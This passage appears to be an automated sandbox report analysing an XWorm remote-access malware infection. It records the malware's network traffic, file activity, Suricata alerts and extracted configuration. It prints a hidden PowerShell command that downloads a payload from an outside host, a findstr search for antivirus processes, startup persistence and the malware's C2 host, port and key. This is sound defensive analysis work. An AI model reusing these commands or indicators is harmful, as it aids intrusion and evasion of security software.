              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8132, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/f.pdf -OutFile C:\Users\user\AppData\Local\Temp\f.pdf", ProcessId: 8184, ProcessName: powershell.exe

              Data Obfuscation

              barindex
              Sigma detected: Drops script at startup location
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 5032, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DanielPulse.url

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Sigma detected: Search for Antivirus process
              Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8932, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 9036, ProcessName: findstr.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T19:10:45.764994+010028528701Malware Command and Control Activity Detected193.26.115.217007192.168.2.849728TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T19:10:45.764994+010028528741Malware Command and Control Activity Detected193.26.115.217007192.168.2.849728TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-12T19:10:36.041153+010028559241Malware Command and Control Activity Detected192.168.2.849728193.26.115.217007TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://myguyapp.com/msword.zipAvira URL Cloud: Label: malware
              Found malware configuration
              Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
              Sample uses string decryption to hide its real strings
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: me-work.com
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: 7007
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: <123456789>
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: <Xwormmm>
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: USB.exe
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49713 version: TLS 1.2
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_004062D5 FindFirstFileW,FindClose,14_2_004062D5
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_00402E18 FindFirstFileW,14_2_00402E18
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406C9B
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D4005
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D494A GetFileAttributesW,FindFirstFileW,FindClose,29_2_002D494A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D3CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DC2FF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DCD14 FindFirstFileW,FindClose,29_2_002DCD14
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,29_2_002DCD9F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF5D8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF735
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DFA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00944005
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094C2FF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,37_2_0094494A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,37_2_0094CD9F
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094CD14 FindFirstFileW,FindClose,37_2_0094CD14
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F5D8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F735
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scrCode function: 37_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00943CE2
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\msword\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Temp\mswordJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49728 -> 193.26.115.21:7007
              Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.26.115.21:7007 -> 192.168.2.8:49728
              Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 193.26.115.21:7007 -> 192.168.2.8:49728
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: me-work.com
              Yara detected Generic Downloader
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: global trafficTCP traffic: 192.168.2.8:49728 -> 193.26.115.21:7007
              Source: Joe Sandbox ViewASN Name: QUICKPACKETUS QUICKPACKETUS
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /c.bat HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pifCode function: 29_2_002E29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,29_2_002E29BA
              Source: global trafficHTTP traffic detected: GET /c.bat HTTP/1.1Accept: */*Accept-Language: en-CHAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /f.pdf HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /msword.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: myguyapp.comConnection: Keep-Alive
              Source: global trafficDNS traffic detected: DNS query: myguyapp.com
              Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
              Source: global trafficDNS traffic detected: DNS query: dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
              Source: global trafficDNS traffic detected: DNS query: me-work.com
              Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: msword.exe.13.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: msword.exe.13.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: msword.exe.13.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: msword.exe, 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000E.00000000.1903617710.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.13.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0
              Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: msword.exe.13.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000025.00000002.2002506530.00000000009A9000.00000002.00000001.01000000.00000011.sdmp, Missouri.14.dr, Carter.pif.20.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: msword.exe.13.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.drString found in binary or memory: http://x1.i.lencr.org/
              Source: mshta.exe, 00000000.00000003.1914069158.000000000A725000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1917190543.000000000A726000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915262349.000000000A726000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1919817498.000000000A726000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1904929361.000000000A721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
              Source: RegAsm.exe, 00000029.00000002.3851904482.00000000014EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.c
              Source: mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926535465.000000000302B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926563616.0000000003034000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926304834.000000000302B000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/
              Source: mshta.exe, mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918050924.000000000306A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918106390.0000000003095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1913738105.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1917050251.0000000003066000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915166385.0000000003095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1917711864.0000000003022000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915597360.000000000305F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1917908255.0000000003066000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915866523.000000000306A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1916638287.000000000A437000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915798353.0000000003022000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1913738105.0000000003095000.00000004.00000020.00020000.00000000.sdmp, c2.htaString found in binary or memory: https://myguyapp.com/c.bat
              Source: mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/c.batE&
              Source: mshta.exe, 00000000.00000003.1916638287.000000000A437000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/c.batU
              Source: cmd.exe, 00000022.00000002.1955529003.0000000003180000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.0000000001442000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851243617.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851607256.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3854974817.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, c[1].bat.0.drString found in binary or memory: https://myguyapp.com/f.pdf
              Source: Carter.pif, 0000001D.00000002.3851285686.0000000000C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdf-
              Source: tasklist.exe, 00000016.00000003.1926304834.0000000003010000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926192131.000000000300E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1927182501.0000000003012000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdf6C
              Source: RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdf:
              Source: tasklist.exe, 00000018.00000002.1939808074.0000000003392000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1938952585.000000000338D000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1939094485.000000000338F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfI
              Source: RegAsm.exe, 00000029.00000002.3851243617.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user
              Source: Carter.pif, 0000001D.00000002.3851285686.0000000000C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSER
              Source: Carter.pif, 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=h
              Source: Carter.pif, 0000001D.00000003.1956168658.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1958820612.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955633417.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291958628.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953710429.0000000000585000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1956408269.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954557812.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955333455.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953745957.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953628491.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953575017.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291998783.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955168928.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291894384.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954636307.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954125310.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 